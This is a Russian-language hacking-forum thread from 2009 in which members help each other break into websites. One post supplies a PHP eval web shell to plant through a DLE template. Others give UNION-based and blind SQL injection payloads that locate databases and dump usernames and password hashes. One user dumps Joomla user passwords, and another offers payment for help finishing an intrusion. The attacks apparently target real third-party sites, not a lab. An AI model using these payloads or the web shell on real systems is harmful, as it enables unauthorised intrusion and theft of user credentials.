Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    в атрибутах тэгов, css-стилях, также не забываем про dom-based xss
     
    3 people like this.
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Омайгадэбл, ты сам то понял что написал?
    Можно!
     
  3. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Понял. Поля Password нету там. А как оно называется я подобрать не смог с кучи вариантов.
    Если кто-то поможет довести до конца в ближайшее - я денег дам.
     
    #9423 Patrik, 23 Oct 2009
    Last edited: 23 Oct 2009
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Как же всё запущено, одно могу сказать, читай, читай, читай... поля пасворд где? :) ньде ...
     
    1 person likes this.
  5. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    не так уж и запущено, только имена таблицы и поля с паролем подобрать не выходит...
     
  6. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    как в дле залить шелл через шаблон?
     
    1 person likes this.
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Впиши туда
    PHP:
    <? eval($_GET['c']) ?>
    .
    Если фильтрации нету, то ?c=wget и т.п.
     
    3 people like this.
  8. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    фильтрация..
    ps есть еще доступ к админке в Coppermine Photo Gallery , на форуме смотрел баги, непрокатило, незнаю вот как туда еще можно шел вбить..
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а просто from название_таблицы не судьба?
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    тогда
    Code:
    16+union+select+1,2,3,table_schema,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x6f73725f7573657273+limit+0,1
    
    то, что выше, выучить как отче наш, а то, что выведет на экран, надо будет добавить к имени таблице, через точку, т.к. это будет БД, в которой лежит интересующая нас таблица

    Результаты будут, если у текущего юзера будут соотвествующие права на доступ к интересующей БД, т.е. к примеру на запрос выше выдаст:

    1321412354123_forum

    тогда следующий запрос такой:

    +union+select+1,2,3,concat(username,0x3b,password) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_users

    если опять выдаст ошибку, вывода только два:

    1. Записей в osr_users просто нет (==0)
    2. нет прав доступа

    Тут можно проверить только пункт 1:

    +union+select+1,2,3,count(*) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_users

    если выведется "0" - то дальше думаю объяснять не надо, значит таблица пустая
     
    #9430 Pashkela, 23 Oct 2009
    Last edited: 23 Oct 2009
    1 person likes this.
  11. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    подскажите в чем проблема:
    есть php скрипт который выполняет поиск в БД MySQL, содержимое запроса к БД примерно такое:
    PHP:
    // так как самого кода скрипта нет, предполагаю, что код выглядит примерно так
    $col1 $_POST['col1'];
    $col2 $_POST['col2'];
    mysql_query("SELECT * FROM `table` WHERE col1='".$col1."' AND col2='".$col2."' еще что-то");
    вывода переменных нет.
    я пытаюсь выполнить запрос к БД, что бы тот вернул мне результат true:
    Code:
    -1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#
    В итоге запрос принимает форуме примерно такую:
    Code:
    SELECT * FROM `table` WHERE col1='-1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#' AND col2='1' еще что-то
    Если я не ошибаюсь, то результат выполнения LOCATE должен вернуть true, т.к. id=1
    Но в результате я получаю:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select id from users where id=1),1,1))#%' AND col2
    Почему так?
     
    #9431 Aртем, 23 Oct 2009
    Last edited: 23 Oct 2009
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Aртем:

    1. Откуда ты узнал, что таблица users вообще существует?
    2. Откуда ты узнал, что колонка id в таблице users вообще существует?
    3. SUBSTRING подразумевает в конце всегда = чему-то, а у тебя просто запрос в скобочках.

    Учи и, главное, понимай синтаксис MySql
     
    1 person likes this.
  13. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Во-первых, можно выполнить запрос
    Code:
    -1' UNION SELECT id FROM users# 
    пусть это и Blind SQL, но включен отчет об ошибках, а это обозначает, что включив логику, можно банальным подбором таблиц/колонок выяснить, что есть, чего нет. Не будь таблицы users и колонки id, PHP интерпретатор вежливо объяснил бы мне, что либо колонки, либо таблицы нет. Но тот в свою очередь умело обработал нужный мне запрос и выдал нормальную страницу, без ошибок.
    Во-вторых SUBSTRING ничего не подразумевает, он просто напросто выводит указанное количество символов из указанной строки начиная с указанного символа по счету.

    Очень охота все же услышать ответ на мой вопрос.
     
    #9433 Aртем, 23 Oct 2009
    Last edited: 23 Oct 2009
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Aртем

    Скобок мало, посмотри на ошибку она синтаксическая, у тебя подзапрос без скобок, вот и ошибка
    Вот так нужно:
    id=-1+or+LOCATE(1,(SUBSTRING((SELECT+id+FROM+users+WHERE+id=1),1,1)))

    Последняя фраза в контексте поста просто потрясающая!

    Паша, не пиши ты тут пожалуйста :)
     
    #9434 Kakoytoxaker, 23 Oct 2009
    Last edited: 23 Oct 2009
    1 person likes this.
  15. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    jokester, спасибо, совсем не обратил внимание, что забыл подзапрос обрамить скобками.

    Но возникла очередная проблема, видимо скрипт не хочет обрабатывать логические операторы OR и AND, т.к. после отправки запроса, браузер безнадежно ожидает ответа. А логика запроса по всей видимости не позволяет не использовать логический оператор И и ИЛИ. Как можно обойти их не прибегая к условиям?
     
  16. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    посоветуйте брут для 4 версии,вывод идет в названии загружаемого файла.
     
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    0-o да ладно?
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Aртем
    Давай линк и конечную цель.
    Я не понимаю почему именно такой способ перебора?
    Если ошибки не отключены, то можно вообще сделать вывод в ошибке если версия базы подходящая, а у тебя больше похоже на изврат, ну или я не понимаю целей.
    И опять-же с трудом представляю, как могут не работать and и or. Так не бывает, что-то ты не правильно делаешь и скрипт тут не причём.
     
  19. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    > Я не понимаю почему именно такой способ перебора?
    Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
    Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
    И линк к сожалению я дать не могу.
    Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
    Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.
     
  20. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Здравствуйте уважаемые Гуру античата.
    У меня возникла небольшая проблемка: нашел Sql-inj в джумле, все шикарно, только одно но:
    union+select+1,2,3,group_concat(password),5+from+jos_users--
    выводит пароли вида:
    fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXnzVnvH0gMziLnCCx
    С джумлой я что-то уже давно не встречался, может я что-то пропустил относительно того как хранится пароль в последних версиях? Версию джумлы кстати определить не удалось: файлик ___.php-dist или как его там, был честно переименован админом.
    И если не сложно, если не сложно, дайте ссылку на пост где различные пути к конфигу апача лежат ибо /usr/local/apache/conf/httpd.conf находится в девственной неприкосновенности, а раскрытие путей нигде не нашел больше
     
Thread Status:
Not open for further replies.